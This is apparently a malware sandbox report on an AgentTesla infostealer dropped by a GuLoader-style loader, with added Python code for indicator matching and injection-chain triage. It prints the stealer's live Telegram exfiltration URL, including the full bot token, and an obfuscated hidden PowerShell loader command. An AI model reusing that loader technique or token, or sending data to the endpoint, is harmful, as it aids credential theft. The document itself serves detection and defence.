Overview

Overall score: 10

Score  Task                   Platform
3      Static                 static
1      attachments.zip        windows7-x64
1      attachments.zip        windows10-2004-x64
10     226350194-...64.rar    windows7-x64
7      226350194-...64.rar    windows10-2004-x64
10     226350194-...64.exe    windows7-x64
10     226350194-...64.exe    windows10-2004-x64
3      Civilhorto...ng.sko    windows7-x64
3      Civilhorto...ng.sko    windows10-2004-x64
3      Ejerkredse...31.don    windows7-x64
3      Ejerkredse...31.don    windows10-2004-x64
8      Ejerkredse...ng.ps1    windows7-x64
8      Ejerkredse...ng.ps1    windows10-2004-x64
3      Sudsers34/...se.ant    windows7-x64
3      Sudsers34/...se.ant    windows10-2004-x64
3      Sudsers34/...ns.oxo    windows7-x64
3      Sudsers34/...ns.oxo    windows10-2004-x64
1      Telekablet...st.txt    windows7-x64
1      Telekablet...st.txt    windows10-2004-x64

Analysis
max time kernel:   148s
max time network:  153s
platform:          windows10-2004_x64
resource:          win10v2004-20240226-en
resource tags:     arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted:         07/03/2024, 13:15
Tasks

Task          Type             Sample                                                          Resource
static1       Static task
behavioral1   Behavioral task  attachments.zip                                                 win7-20240220-en
behavioral2   Behavioral task  attachments.zip                                                 win10v2004-20240226-en
behavioral3   Behavioral task  226350194-050944-sanlccjavap0003-11764.rar                      win7-20240221-en
behavioral4   Behavioral task  226350194-050944-sanlccjavap0003-11764.rar                      win10v2004-20240226-en
behavioral5   Behavioral task  226350194-050944-sanlccjavap0003-11764.exe                      win7-20240221-en
behavioral6   Behavioral task  226350194-050944-sanlccjavap0003-11764.exe                      win10v2004-20240226-en
behavioral7   Behavioral task  Civilhortonoms/Dyretmmersken/Mealybug/Laesning.sko              win7-20240221-en
behavioral8   Behavioral task  Civilhortonoms/Dyretmmersken/Mealybug/Laesning.sko              win10v2004-20240226-en
behavioral9   Behavioral task  Ejerkredsen/Lulledes/Filateliens31.don                          win7-20240221-en
behavioral10  Behavioral task  Ejerkredsen/Lulledes/Filateliens31.don                          win10v2004-20240226-en
behavioral11  Behavioral task  Ejerkredsen/Lulledes/Preconizing.ps1                            win7-20240221-en
behavioral12  Behavioral task  Ejerkredsen/Lulledes/Preconizing.ps1                            win10v2004-20240226-en
behavioral13  Behavioral task  Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/indsigelse.ant    win7-20240221-en
behavioral14  Behavioral task  Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/indsigelse.ant    win10v2004-20240226-en
behavioral15  Behavioral task  Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/smreostens.oxo    win7-20240221-en
behavioral16  Behavioral task  Sudsers34/Neoterist/Opslagsbindenes/Oplivelse/smreostens.oxo    win10v2004-20240226-en
behavioral17  Behavioral task  Telekablets/krakileres/miditest/Herpetotomist.txt               win7-20240221-en
behavioral18  Behavioral task  Telekablets/krakileres/miditest/Herpetotomist.txt               win10v2004-20240226-en
General

Target:  226350194-050944-sanlccjavap0003-11764.exe
Size:    626KB
MD5:     0d4bb5c57ce0f99b36056892cfe87f0c
SHA1:    bd884e9d666bce68ef23dfa139f6477f1c50f7ab
SHA256:  0301d446fd70d25f294abb066b139bdc8d5362f86d9d10ae4c5ed13e7e6f311c
SHA512:  7d404dc721e4eb51f91956b96d3864ae2d2cc9e8c8464d446abf087b84466230ddea2662107b5d192369e8b2211b3616025628dc07f4eb679676144915dcaf6e
SSDEEP:  12288:RhKVcnRerrRiJJGDktgdRYCryyqmsufs5BKGR9YWYn+4t8w:REGnReZeJGDikBrLqmZgBKgPKnt/
Malware Config

Extracted family: agenttesla
Exfiltration endpoint (Telegram Bot API; the bot token is carried in the URL path): https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/
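The extracted endpoint is most useful once it is turned into indicators that can be shared and matched. The following is an added example, not tria.ge output or AgentTesla code: it parses the Bot API URL from the report into bot id and token, redacts the token for sharing, and runs the match over a few constructed proxy log lines whose layout (client, verb, URL) is hypothetical.

```python
"""Turn the extracted AgentTesla Telegram endpoint into checkable indicators.

Added example, not tria.ge output. C2_URL is the URL from the report; the
proxy log lines are constructed and their layout is hypothetical.
"""
import re
from urllib.parse import urlsplit

C2_URL = "https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/"

# Bot API paths look like /bot<numeric bot id>:<token>/<method>. The token
# character class is an assumption kept loose on purpose so format drift
# does not silently break the match.
BOT_PATH_RE = re.compile(
    r"^/bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]+)(?:/(?P<method>[A-Za-z]+))?/?$"
)


def parse_bot_url(url):
    """Return bot_id, token and method (None if absent) for a Telegram Bot API URL, else None."""
    parts = urlsplit(url)
    if parts.hostname != "api.telegram.org":
        return None
    m = BOT_PATH_RE.match(parts.path)
    if not m:
        return None
    return {"bot_id": m.group("bot_id"), "token": m.group("token"), "method": m.group("method")}


def redact(token, keep=4):
    """Shareable form of a token: first and last few characters only."""
    return token[:keep] + "..." + token[-keep:]


def indicators(url):
    """Indicators an analyst can circulate without republishing the full token."""
    info = parse_bot_url(url)
    return {
        "host": "api.telegram.org",
        "bot_id": info["bot_id"],
        "token_redacted": redact(info["token"]),
        "path_prefix": "/bot" + info["bot_id"] + ":",
    }


# Constructed proxy log: "<client> <verb> <url>". Only the first two lines use
# the bot id from the report; the others are decoys that must not match.
PROXY_LOG = [
    "10.0.0.5 POST https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocument",
    "10.0.0.5 GET https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/getMe",
    "10.0.0.7 GET https://api.telegram.org/",
    "10.0.0.9 POST https://api.telegram.org/bot99999:zzzz/sendMessage",
    "10.0.0.9 GET https://example.invalid/bot5147163644:x",
]


def match_log(lines, bot_id):
    """(client, Bot API method) for every line that reaches the Bot API with the given bot id."""
    hits = []
    for line in lines:
        client, _verb, url = line.split(" ", 2)
        info = parse_bot_url(url)
        if info and info["bot_id"] == bot_id:
            hits.append((client, info["method"]))
    return hits


if __name__ == "__main__":
    ioc = indicators(C2_URL)
    print(ioc)
    print(match_log(PROXY_LOG, ioc["bot_id"]))
```

Matching on the bot id rather than on the full token keeps the detection working if the token is rotated but the bot is reused, and the redacted form is what belongs in a shared IOC list; the host alone is a poor indicator because legitimate Telegram clients also talk to api.telegram.org.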
Signatures

AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.

GuLoader, CloudEyE
  A shellcode-based downloader first seen in 2020.

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
  PID 4224  wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  PID 608   powershell.exe
  PID 4224  wab.exe

Suspicious use of SetThreadContext (1 IoC)
  PID 608 (powershell.exe) set the thread context of PID 4224 (wab.exe), procid_target 104

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (11 IoCs)
  PID 608   powershell.exe  (9 hits)
  PID 4224  wab.exe         (2 hits)

Suspicious behavior: MapViewOfSection (1 IoC)
  PID 608   powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege  PID 608   powershell.exe
  Token: SeDebugPrivilege  PID 4224  wab.exe

Suspicious use of WriteProcessMemory (11 IoCs)
  Source PID  Source process                              Target PID  procid_target  Hits
  2032        226350194-050944-sanlccjavap0003-11764.exe  608         89             3
  608         powershell.exe                              2492        91             3
  608         powershell.exe                              4224        104            5
Processes

1. C:\Users\Admin\AppData\Local\Temp\226350194-050944-sanlccjavap0003-11764.exe  (PID 2032)
   Command line: "C:\Users\Admin\AppData\Local\Temp\226350194-050944-sanlccjavap0003-11764.exe"
   Signatures: Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 608)
      Command line: "powershell.exe" -windowstyle hidden "$angstfyldtes=Get-Content 'C:\Users\Admin\AppData\Local\aftgtstilsagnenes\Ejerkredsen\Lulledes\Preconizing.Nig';$Bombeeksperterne=$angstfyldtes.SubString(58929,3);.$Bombeeksperterne($angstfyldtes)"
      The one-liner reads Preconizing.Nig, takes the three characters at offset 58929 of that content as a command name and invokes it in the current scope with the dot-source operator, passing the whole content as the argument; the report does not show which three characters those are.
      Signatures: Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: MapViewOfSection; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

      3. C:\Windows\SysWOW64\cmd.exe  (PID 2492)
         Command line: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"

      3. C:\Program Files (x86)\windows mail\wab.exe  (PID 4224)
         Command line: "C:\Program Files (x86)\windows mail\wab.exe"
         Signatures: Suspicious use of NtCreateThreadExHideFromDebugger; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
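The process tree and the WriteProcessMemory/SetThreadContext rows together describe one chain: the dropper starts a hidden PowerShell stage that slices its own command name out of a loaded file, and that PowerShell process writes into and redirects a thread of wab.exe. The following is an added example, not tria.ge output or GuLoader code: it rebuilds the chain from the PIDs, command lines and signature rows in the report as constructed, Sysmon-like event records (the record layout is hypothetical), parses the SubString stage out of the command line, recovers the sliced command from a constructed stand-in script (the three characters "iex" are an assumption, the report does not show them), and correlates the API rows into a single injection finding.

```python
"""Triage of the process tree and injection signatures above.

Added example, not tria.ge output. The process and API events are constructed
from the PIDs, command lines and signature rows in the report; the record
layout is a hypothetical Sysmon-like shape, and the three-character command
placed in the stand-in script is an assumption.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Process creations, constructed from the report's process tree.
EVENTS = [
    ProcEvent(2032, 0,
              r"C:\Users\Admin\AppData\Local\Temp\226350194-050944-sanlccjavap0003-11764.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\226350194-050944-sanlccjavap0003-11764.exe"'),
    ProcEvent(608, 2032,
              r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'''"powershell.exe" -windowstyle hidden "$angstfyldtes=Get-Content 'C:\Users\Admin\AppData\Local\aftgtstilsagnenes\Ejerkredsen\Lulledes\Preconizing.Nig';$Bombeeksperterne=$angstfyldtes.SubString(58929,3);.$Bombeeksperterne($angstfyldtes)"'''),
    ProcEvent(2492, 608, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"'),
    ProcEvent(4224, 608, r"C:\Program Files (x86)\windows mail\wab.exe",
              r'"C:\Program Files (x86)\windows mail\wab.exe"'),
]

# API-level IoCs as (source pid, api, target pid), constructed from the signature rows.
API_EVENTS = [
    (2032, "WriteProcessMemory", 608),
    (608, "WriteProcessMemory", 2492),
    (608, "WriteProcessMemory", 4224),
    (608, "SetThreadContext", 4224),
    (608, "MapViewOfSection", None),
    (608, "NtSetInformationThreadHideFromDebugger", None),
    (4224, "NtSetInformationThreadHideFromDebugger", None),
    (4224, "NtCreateThreadExHideFromDebugger", None),
]

# "Read a file, slice a command name out of it, call it": the stage shape in the report.
STAGE_RE = re.compile(
    r"Get-Content\s+'(?P<path>[^']+)'.*?\.SubString\((?P<off>\d+),\s*(?P<len>\d+)\)",
    re.IGNORECASE | re.DOTALL,
)


def parse_stage(cmdline):
    """Return {path, offset, length} for the SubString stage in a command line, else None."""
    m = STAGE_RE.search(cmdline)
    if not m:
        return None
    return {"path": m.group("path"), "offset": int(m.group("off")), "length": int(m.group("len"))}


def recover_command(script_text, offset, length):
    """Apply the loader's own SubString(offset, length) to the text it loads.

    .NET SubString counts UTF-16 code units; Python str indexing agrees as long
    as the text has no characters outside the BMP (assumed here).
    """
    return script_text[offset:offset + length]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def flag_process_chain(events):
    """Findings from parent/child relations and command-line shape alone."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        pbase = basename(parent.image) if parent else ""
        if basename(e.image) == "powershell.exe":
            stage = parse_stage(e.cmdline)
            if stage and "-windowstyle hidden" in e.cmdline.lower():
                findings.append((e.pid, "hidden PowerShell invokes a SubString of a loaded file as a command"))
            if stage and not stage["path"].lower().endswith(".ps1"):
                findings.append((e.pid, "PowerShell stage loaded from a non-.ps1 file: " + basename(stage["path"])))
        if basename(e.image) == "wab.exe" and pbase == "powershell.exe":
            findings.append((e.pid, "wab.exe started by powershell.exe"))
    return findings


def injection_pairs(api_events):
    """(source, target) pairs where one process both wrote into another and set
    its thread context: the write-then-redirect pattern behind hollowing."""
    wrote = {(s, t) for s, api, t in api_events if api == "WriteProcessMemory" and t}
    ctx = {(s, t) for s, api, t in api_events if api == "SetThreadContext" and t}
    return sorted(wrote & ctx)


if __name__ == "__main__":
    stage = parse_stage(EVENTS[1].cmdline)
    # Constructed stand-in for Preconizing.Nig: filler with the assumed "iex"
    # placed where the loader slices.
    fake_script = "#" * stage["offset"] + "iex" + "#" * 16
    print(recover_command(fake_script, stage["offset"], stage["length"]))
    for finding in flag_process_chain(EVENTS):
        print(finding)
    print(injection_pairs(API_EVENTS))
```

The parent/child rules are the ones that survive a re-obfuscated sample: variable names and the offset change between builds, but a hidden-window powershell.exe that slices a command name out of a non-.ps1 file and then parents wab.exe does not. On a real endpoint the same recovery step (re-applying the SubString the loader itself specifies) is how to get the invoked command without running the script.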
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize:  60B
MD5:       d17fe0a3f47be24a6453e9ef58c94641
SHA1:      6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256:    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512:    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize:  348KB
MD5:       edac2c2f62e371a80143df8caaec5b24
SHA1:      0b7e4c090f25b6a0ffdab3e1d4e94ea3a706584b
SHA256:    ae0652e2eedf1db5506d11bdf75d677c37fb7896c64435f6afdf9161235a9616
SHA512:    aa37fc1656f385b4a18c2cd8edd4c6befec3b9df14fb656bbc831274c4e1708e292e0e60e26470f3159d2ab1819b39594cc854428b65028bc468c43d3d12e3be

Filesize:  57KB
MD5:       f5a06265c76853290d3b7ed1c1d3e7b9
SHA1:      4083441407a629edd297d1a480a4957740b99fd1
SHA256:    f15289a9086ec32c0f072940209c5c50412dde5275dac49a8d271cb53e843eab
SHA512:    52ef36d8443eec762f2980b0ada477a9b74f0af2d0cedfb73015fbac04c28e85a85af4be6a4f67c6d7ee3b59b07abf6be2042465154ac3525e035947db15d6e8